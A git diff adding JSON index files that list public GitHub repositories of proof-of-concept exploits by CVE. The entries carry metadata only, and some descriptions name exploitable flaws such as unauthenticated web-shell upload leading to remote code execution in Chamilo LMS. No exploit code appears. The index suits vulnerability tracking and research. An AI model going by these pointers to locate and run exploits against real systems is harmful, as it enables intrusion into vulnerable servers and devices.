"login": "po6ix", + "id": 61380567, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61380567?v=4", + "html_url": "https:\/\/github.com\/po6ix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/po6ix\/POC-for-CVE-2023-41993", + "description": null, + "fork": false, + "created_at": "2023-10-15T12:14:18Z", + "updated_at": "2024-11-13T18:00:48Z", + "pushed_at": "2024-03-08T12:57:53Z", + "stargazers_count": 195, + "watchers_count": 195, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 195, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 705738898, + "name": "cve-2023-41993-test", + "full_name": "hrtowii\/cve-2023-41993-test", + "owner": { + "login": "hrtowii", + "id": 68852354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68852354?v=4", + "html_url": "https:\/\/github.com\/hrtowii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hrtowii\/cve-2023-41993-test", + "description": "testing poc", + "fork": false, + "created_at": "2023-10-16T15:43:50Z", + "updated_at": "2024-09-03T07:10:23Z", + "pushed_at": "2023-10-18T17:58:35Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 705857370, + "name": "CVE-2023-41993", + "full_name": "0x06060606\/CVE-2023-41993", + "owner": { + "login": "0x06060606", + "id": 47062591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47062591?v=4", + "html_url": "https:\/\/github.com\/0x06060606", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x06060606\/CVE-2023-41993", + "description": "CVE-2023-41993", + "fork": false, + "created_at": "2023-10-16T20:34:02Z", + "updated_at": "2024-10-02T21:51:08Z", + "pushed_at": "2024-11-18T22:40:13Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-41993", + "exploit", + "hacktoberfest", + "hacktoberfest2023", + "ios", + "iphone", + "macos", + "webkit" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707881504, + "name": "cve-test", + "full_name": "Mangaia\/cve-test", + "owner": { + "login": "Mangaia", + "id": 21020827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21020827?v=4", + "html_url": "https:\/\/github.com\/Mangaia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mangaia\/cve-test", + "description": "testing cve-2023-41993-test", + "fork": false, + "created_at": "2023-10-20T22:04:40Z", + "updated_at": "2023-10-20T22:04:41Z", + "pushed_at": "2023-10-20T22:04:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 764522978, + "name": "CVE-2023-41993", + "full_name": "J3Ss0u\/CVE-2023-41993", + "owner": { + "login": "J3Ss0u", + "id": 90192954, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90192954?v=4", + "html_url": "https:\/\/github.com\/J3Ss0u", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/J3Ss0u\/CVE-2023-41993", + "description": null, + "fork": false, + "created_at": "2024-02-28T08:27:43Z", + "updated_at": "2024-02-28T08:32:07Z", + "pushed_at": "2024-02-28T08:38:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4206.json b/2023/CVE-2023-4206.json new file mode 100644 index 0000000000..9a2697e26b --- /dev/null +++ b/2023/CVE-2023-4206.json @@ -0,0 +1,33 @@ +[ + { + "id": 731880804, + "name": "Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208", + "full_name": "hshivhare67\/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208", + "description": null, + "fork": false, + "created_at": "2023-12-15T05:13:24Z", + "updated_at": "2023-12-15T05:18:44Z", + "pushed_at": "2023-12-15T12:57:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42115.json b/2023/CVE-2023-42115.json new file mode 100644 index 0000000000..447ebbee3e --- /dev/null +++ b/2023/CVE-2023-42115.json @@ -0,0 +1,64 @@ +[ + { + "id": 851312368, + "name": "cve-2023-42115", + "full_name": "kirinse\/cve-2023-42115", + "owner": { + "login": "kirinse", + "id": 299712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/299712?v=4", + "html_url": "https:\/\/github.com\/kirinse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kirinse\/cve-2023-42115", + "description": "This module exploits a vulnerability in the target service identified as CVE-2023-42115.", + "fork": false, + "created_at": "2024-09-02T21:17:41Z", + "updated_at": "2024-09-02T21:17:41Z", + "pushed_at": "2024-09-02T13:28:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 885081385, + "name": "Pocy", + "full_name": "AdaHop-Cyber-Security\/Pocy", + "owner": { + "login": "AdaHop-Cyber-Security", + "id": 56049928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56049928?v=4", + "html_url": "https:\/\/github.com\/AdaHop-Cyber-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AdaHop-Cyber-Security\/Pocy", + "description": "A CVE-2023-42115 POC", + "fork": false, + "created_at": "2024-11-07T23:21:45Z", + "updated_at": "2024-11-07T23:25:49Z", + "pushed_at": "2024-11-07T23:25:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-422.json b/2023/CVE-2023-422.json new file mode 100644 index 0000000000..3aca72f69c --- /dev/null +++ b/2023/CVE-2023-422.json @@ -0,0 +1,33 @@ +[ + { + "id": 826504701, + "name": "CVE-2023-422-Chamilo-LMS-RCE", + "full_name": "HusenjanDev\/CVE-2023-422-Chamilo-LMS-RCE", + "owner": { + "login": "HusenjanDev", + "id": 88688451, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88688451?v=4", + "html_url": "https:\/\/github.com\/HusenjanDev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HusenjanDev\/CVE-2023-422-Chamilo-LMS-RCE", + "description": "Remote Code Execution for Chamilo LMS", + "fork": false, + "created_at": "2024-07-09T20:47:00Z", + "updated_at": "2024-07-09T20:55:58Z", + "pushed_at": "2024-07-09T20:55:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4220.json b/2023/CVE-2023-4220.json new file mode 100644 index 0000000000..fffc003ec3 --- /dev/null +++ b/2023/CVE-2023-4220.json @@ -0,0 +1,659 @@ +[ + { + "id": 825358517, + "name": "chamilo-lms-unauthenticated-big-upload-rce-poc", + "full_name": "m3m0o\/chamilo-lms-unauthenticated-big-upload-rce-poc", + "owner": { + "login": "m3m0o", + "id": 130102748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130102748?v=4", + "html_url": "https:\/\/github.com\/m3m0o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3m0o\/chamilo-lms-unauthenticated-big-upload-rce-poc", + "description": "This is a script written in Python that allows the exploitation of the Chamilo's LMS software security flaw described in CVE-2023-4220", + "fork": false, + "created_at": "2024-07-07T15:08:30Z", + "updated_at": "2024-10-27T17:09:40Z", + "pushed_at": "2024-07-27T00:19:17Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chamilo", + "chamilo-lms", + "cve", + "cve-2023-4220", + "exploit", + "rce", + "rce-exploit" + ], + "visibility": "public", + "forks": 3, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825375455, + "name": "Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220", + "full_name": "dollarboysushil\/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220", + "owner": { + "login": "dollarboysushil", + "id": 48991715, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48991715?v=4", + "html_url": "https:\/\/github.com\/dollarboysushil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dollarboysushil\/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220", + "description": "Unrestricted file upload in big file upload functionality in `\/main\/inc\/lib\/javascript\/bigupload\/inc\/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.", + "fork": false, + "created_at": "2024-07-07T15:53:54Z", + "updated_at": "2024-07-31T16:11:57Z", + "pushed_at": "2024-07-07T16:18:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chamilo-exploit", + "chamilo-lms", + "cve-2023-4220", + "file-upload-vulnerability", + "hackthebox" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825400213, + "name": "CVE-2023-4220", + "full_name": "charlesgargasson\/CVE-2023-4220", + "owner": { + "login": "charlesgargasson", + "id": 26895987, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26895987?v=4", + "html_url": "https:\/\/github.com\/charlesgargasson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charlesgargasson\/CVE-2023-4220", + "description": "RCE Chamilo 1.11.24", + "fork": false, + "created_at": "2024-07-07T16:57:18Z", + "updated_at": "2024-08-16T20:18:49Z", + "pushed_at": "2024-07-11T07:27:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2023", + "beersel", + "bigupload", + "chamilo", + "chamilo-lms", + "cve", + "cve-2023-4220", + "exploit", + "lms", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825617104, + "name": "CVE-2023-4220", + "full_name": "insomnia-jacob\/CVE-2023-4220", + "owner": { + "login": "insomnia-jacob", + "id": 174169862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/174169862?v=4", + "html_url": "https:\/\/github.com\/insomnia-jacob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/insomnia-jacob\/CVE-2023-4220", + "description": "CVE-2023-4220 POC RCE", + "fork": false, + "created_at": "2024-07-08T07:31:35Z", + "updated_at": "2024-11-06T23:17:18Z", + "pushed_at": "2024-08-07T23:36:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825678272, + "name": "Chamilo-CVE-2023-4220-Exploit", + "full_name": "Ziad-Sakr\/Chamilo-CVE-2023-4220-Exploit", + "owner": { + "login": "Ziad-Sakr", + "id": 60154552, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60154552?v=4", + "html_url": "https:\/\/github.com\/Ziad-Sakr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ziad-Sakr\/Chamilo-CVE-2023-4220-Exploit", + "description": "This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this location \"\/main\/inc\/lib\/javascript\/bigupload\/inc\/bigUpload.php\" in Chamilo LMS <= v1.11.24, and Attackers can obtain remote code execution via uploading of web shell.", + "fork": false, + "created_at": "2024-07-08T09:48:38Z", + "updated_at": "2024-11-08T19:00:18Z", + "pushed_at": "2024-07-08T11:55:53Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chamilo", + "chamilo-lms", + "cve", + "exploit", + "file-upload-poc", + "lms", + "penetration", + "penetration-testing", + "poc", + "web-shell" + ], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826392009, + "name": "cve-2023-4220-poc", + "full_name": "HO4XXX\/cve-2023-4220-poc", + "owner": { + "login": "HO4XXX", + "id": 128794868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128794868?v=4", + "html_url": "https:\/\/github.com\/HO4XXX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HO4XXX\/cve-2023-4220-poc", + "description": "PoC for CVE-2023-4220 - Chamilo LMS - Unauthenticated File Upload in BigUpload", + "fork": false, + "created_at": "2024-07-09T16:09:18Z", + "updated_at": "2024-07-10T08:14:06Z", + "pushed_at": "2024-07-09T16:13:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826491015, + "name": "CVE-2023-4220-PoC", + "full_name": "B1TC0R3\/CVE-2023-4220-PoC", + "owner": { + "login": "B1TC0R3", + "id": 77125551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77125551?v=4", + "html_url": "https:\/\/github.com\/B1TC0R3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/B1TC0R3\/CVE-2023-4220-PoC", + "description": "Proof of concept exploit for CVE-2023-4220", + "fork": false, + "created_at": "2024-07-09T20:06:40Z", + "updated_at": "2024-08-19T08:41:49Z", + "pushed_at": "2024-08-19T08:41:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 827338519, + "name": "CVE-2023-4220", + "full_name": "nr4x4\/CVE-2023-4220", + "owner": { + "login": "nr4x4", + "id": 104433163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104433163?v=4", + "html_url": "https:\/\/github.com\/nr4x4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nr4x4\/CVE-2023-4220", + "description": "CVE-2023–4220 Exploit", + "fork": false, + "created_at": "2024-07-11T13:06:17Z", + "updated_at": "2024-07-12T10:21:41Z", + "pushed_at": "2024-07-12T10:21:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828720069, + "name": "CVE-2023-4220-Exploit", + "full_name": "Al3xGD\/CVE-2023-4220-Exploit", + "owner": { + "login": "Al3xGD", + "id": 115897853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115897853?v=4", + "html_url": "https:\/\/github.com\/Al3xGD", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al3xGD\/CVE-2023-4220-Exploit", + "description": "LMS Chamilo 1.11.24 CVE-2023-4220 Exploit", + "fork": false, + "created_at": "2024-07-15T01:38:47Z", + "updated_at": "2024-07-15T01:51:16Z", + "pushed_at": "2024-07-15T01:51:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 837062013, + "name": "chamilo-lms-unauthenticated-rce-poc", + "full_name": "charchit-subedi\/chamilo-lms-unauthenticated-rce-poc", + "owner": { + "login": "charchit-subedi", + "id": 59109697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59109697?v=4", + "html_url": "https:\/\/github.com\/charchit-subedi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charchit-subedi\/chamilo-lms-unauthenticated-rce-poc", + "description": "This is a script written in Python that allows the exploitation of the Chamilo's LMS software security flaw described in CVE-2023-4220 ", + "fork": false, + "created_at": "2024-08-02T06:14:56Z", + "updated_at": "2024-08-02T06:17:33Z", + "pushed_at": "2024-08-02T06:17:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844242066, + "name": "CVE-2023-4220-Proof-of-concept", + "full_name": "LGenAgul\/CVE-2023-4220-Proof-of-concept", + "owner": { + "login": "LGenAgul", + "id": 110150285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110150285?v=4", + "html_url": "https:\/\/github.com\/LGenAgul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LGenAgul\/CVE-2023-4220-Proof-of-concept", + "description": "Chamilo LMS Unauthenticated Big Upload File that allows remote code execution", + "fork": false, + "created_at": "2024-08-18T20:00:33Z", + "updated_at": "2024-08-18T20:10:32Z", + "pushed_at": "2024-08-18T20:10:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 846844178, + "name": "CVE-2023-4220", + "full_name": "VanishedPeople\/CVE-2023-4220", + "owner": { + "login": "VanishedPeople", + "id": 155242438, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155242438?v=4", + "html_url": "https:\/\/github.com\/VanishedPeople", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VanishedPeople\/CVE-2023-4220", + "description": "CVE-2023-4220 PoC Chamilo RCE", + "fork": false, + "created_at": "2024-08-24T05:32:31Z", + "updated_at": "2024-10-21T13:18:06Z", + "pushed_at": "2024-09-23T18:27:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 847006463, + "name": "CVE-2023-4220_Chamilo_RCE", + "full_name": "thefizzyfish\/CVE-2023-4220_Chamilo_RCE", + "owner": { + "login": "thefizzyfish", + "id": 94797978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94797978?v=4", + "html_url": "https:\/\/github.com\/thefizzyfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thefizzyfish\/CVE-2023-4220_Chamilo_RCE", + "description": "Python exploit for Chamilo Unrestricted File Upload Vuln - CVE-2023-4220", + "fork": false, + "created_at": "2024-08-24T15:25:28Z", + "updated_at": "2024-11-09T18:59:16Z", + "pushed_at": "2024-10-03T19:29:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848391001, + "name": "CVE-2023-4220", + "full_name": "qrxnz\/CVE-2023-4220", + "owner": { + "login": "qrxnz", + "id": 176516119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176516119?v=4", + "html_url": "https:\/\/github.com\/qrxnz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qrxnz\/CVE-2023-4220", + "description": "CVE-2023-4220 Chamilo Exploit", + "fork": false, + "created_at": "2024-08-27T17:12:48Z", + "updated_at": "2024-08-27T17:17:27Z", + "pushed_at": "2024-08-27T17:17:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851612450, + "name": "Chamilo-CVE-2023-4220-RCE-Exploit", + "full_name": "0x00-null\/Chamilo-CVE-2023-4220-RCE-Exploit", + "owner": { + "login": "0x00-null", + "id": 10076254, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10076254?v=4", + "html_url": "https:\/\/github.com\/0x00-null", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x00-null\/Chamilo-CVE-2023-4220-RCE-Exploit", + "description": "(CVE-2023-4220) Chamilo LMS Unauthenticated Big Upload File Remote Code Execution ", + "fork": false, + "created_at": "2024-09-03T12:16:52Z", + "updated_at": "2024-09-10T12:37:45Z", + "pushed_at": "2024-09-03T13:11:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 877083916, + "name": "CVE-2023-4220-RCE", + "full_name": "bueno-armando\/CVE-2023-4220-RCE", + "owner": { + "login": "bueno-armando", + "id": 124701314, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124701314?v=4", + "html_url": "https:\/\/github.com\/bueno-armando", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bueno-armando\/CVE-2023-4220-RCE", + "description": null, + "fork": false, + "created_at": "2024-10-23T04:01:20Z", + "updated_at": "2024-10-23T05:06:22Z", + "pushed_at": "2024-10-23T05:06:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879406527, + "name": "Chamilo-LMS-CVE-2023-4220-Exploit", + "full_name": "0xDTC\/Chamilo-LMS-CVE-2023-4220-Exploit", + "owner": { + "login": "0xDTC", + "id": 95960398, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95960398?v=4", + "html_url": "https:\/\/github.com\/0xDTC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xDTC\/Chamilo-LMS-CVE-2023-4220-Exploit", + "description": "Refurbish Chamilo LMS CVE-2023-4220 exploit written in bash", + "fork": false, + "created_at": "2024-10-27T20:18:13Z", + "updated_at": "2024-10-27T20:19:22Z", + "pushed_at": "2024-10-27T20:19:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 882333805, + "name": "CVE-2023-4220", + "full_name": "H4cking4All\/CVE-2023-4220", + "owner": { + "login": "H4cking4All", + "id": 187107603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/187107603?v=4", + "html_url": "https:\/\/github.com\/H4cking4All", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4cking4All\/CVE-2023-4220", + "description": "CVE-2023-4220 Chamilo Exploit", + "fork": false, + "created_at": "2024-11-02T14:49:51Z", + "updated_at": "2024-11-02T15:09:11Z", + "pushed_at": "2024-11-02T15:09:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 886317363, + "name": "CVE-2023-4220-HTB-PermX", + "full_name": "oxapavan\/CVE-2023-4220-HTB-PermX", + "owner": { + "login": "oxapavan", + "id": 106510266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106510266?v=4", + "html_url": "https:\/\/github.com\/oxapavan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oxapavan\/CVE-2023-4220-HTB-PermX", + "description": null, + "fork": false, + "created_at": "2024-11-10T18:13:18Z", + "updated_at": "2024-11-11T12:18:47Z", + "pushed_at": "2024-11-10T18:23:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887758220, + "name": "CVE-2023-4220", + "full_name": "numaan911098\/CVE-2023-4220", + "owner": { + "login": "numaan911098", + "id": 50366430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50366430?v=4", + "html_url": "https:\/\/github.com\/numaan911098", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numaan911098\/CVE-2023-4220", + "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-4220", + "fork": false, + "created_at": "2024-11-13T08:30:00Z", + "updated_at": "2024-11-13T08:34:24Z", + "pushed_at": "2024-11-13T08:34:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42222.json b/2023/CVE-2023-42222.json new file mode 100644 index 0000000000..c9a2481295 --- /dev/null +++ b/2023/CVE-2023-42222.json @@ -0,0 +1,33 @@ +[ + { + "id": 697420617, + "name": "CVE-2023-42222", + "full_name": "itssixtyn3in\/CVE-2023-42222", + "owner": { + "login": "itssixtyn3in", + "id": 130003354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130003354?v=4", + "html_url": "https:\/\/github.com\/itssixtyn3in", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/itssixtyn3in\/CVE-2023-42222", + "description": null, + "fork": false, + "created_at": "2023-09-27T17:36:30Z", + "updated_at": "2024-01-07T10:55:15Z", + "pushed_at": "2023-09-27T17:51:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4226.json b/2023/CVE-2023-4226.json new file mode 100644 index 0000000000..5ca852c90b --- /dev/null +++ b/2023/CVE-2023-4226.json @@ -0,0 +1,33 @@ +[ + { + "id": 826590216, + "name": "CVE-2023-4226-POC", + "full_name": "krishnan-tech\/CVE-2023-4226-POC", + "owner": { + "login": "krishnan-tech", + "id": 55576296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55576296?v=4", + "html_url": "https:\/\/github.com\/krishnan-tech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/krishnan-tech\/CVE-2023-4226-POC", + "description": "POC for CVE-2023-4220 - Chamilo LMS Unauthenticated Big Upload File Remote Code Execution", + "fork": false, + "created_at": "2024-07-10T02:26:01Z", + "updated_at": "2024-07-10T02:27:06Z", + "pushed_at": "2024-07-10T02:26:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-42283.json b/2023/CVE-2023-42283.json new file mode 100644 index 0000000000..c29d80bdb6 --- /dev/null +++ b/2023/CVE-2023-42283.json @@ 